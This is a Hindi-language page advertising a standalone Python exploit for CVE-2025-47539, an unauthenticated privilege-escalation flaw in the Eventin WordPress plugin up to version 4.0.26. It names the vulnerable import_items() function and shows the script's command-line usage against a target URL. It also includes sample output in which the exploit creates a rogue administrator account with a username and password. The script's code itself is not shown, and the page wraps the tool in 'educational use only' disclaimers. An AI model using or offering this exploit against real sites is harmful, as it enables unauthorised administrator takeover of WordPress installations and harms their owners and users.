
Eventin <= 4.0.26 - अपुष्टीकृत विशेषाधिकार वृद्धि के लिए लापता प्राधिकरण
WordPress के लिए Event Manager, Events Calendar, Tickets, Registrations – Eventin प्लगइन import_items() फ़ंक्शन में अनुपलब्ध प्राधिकरण जाँच के कारण अनधिकृत विशेषाधिकार वृद्धि के प्रति संवेदनशील है।
<= 4.0.26CVE-2025-475399.8 (गंभीर)7 मई, 202515 मई, 2025अनधिकृत हमलावर REST API के लिए एक दुर्भावनापूर्ण अनुरोध तैयार कर सकते हैं और बिना किसी उपयोगकर्ता इंटरैक्शन के administrator विशेषाधिकारों वाला एक नया उपयोगकर्ता बना सकते हैं।
यह Python स्क्रिप्ट CVE-2025-47539 के लिए एक स्वतंत्र शोषण उपकरण है।
यह करेगा:
⚠️ यह स्क्रिप्ट केवल शैक्षिक उपयोग और पेशेवर सुरक्षा मूल्यांकन के लिए है।
usage: a.py [-h] -u URL
Exploit for CVE-2025-47539 # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target base URL (e.g. http://target.com)
By:Nxploited (Khaled_alenazi) | [email protected]
[+] Exploitation succeeded
[+] Response:
{"message":"Successfully imported speaker"}
[+] Exploited Account Details
Name : Nxploited (Khaled_alenazi)
Email : [email protected]
Username : NxPloted
Password : nxploit123
Role : administrator
Exploit: By: Nxploited (Khaled_alenazi)
Use this script for educational purposes only. I am not responsible for your actions.
इस शोषण के लिए 10,000+ से अधिक WordPress साइट्स की पुष्टि की गई है।
Eventin ≤ 4.0.26 का उपयोग करने वाले सभी साइट प्रशासकों को तुरंत संस्करण 4.0.28 या बाद में अपडेट करना चाहिए।
यह उपकरण केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
निर्माता इस स्क्रिप्ट के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
द्वारा: Nxploited ( Khaled_Alenazi )
📧 संपर्क: [email protected]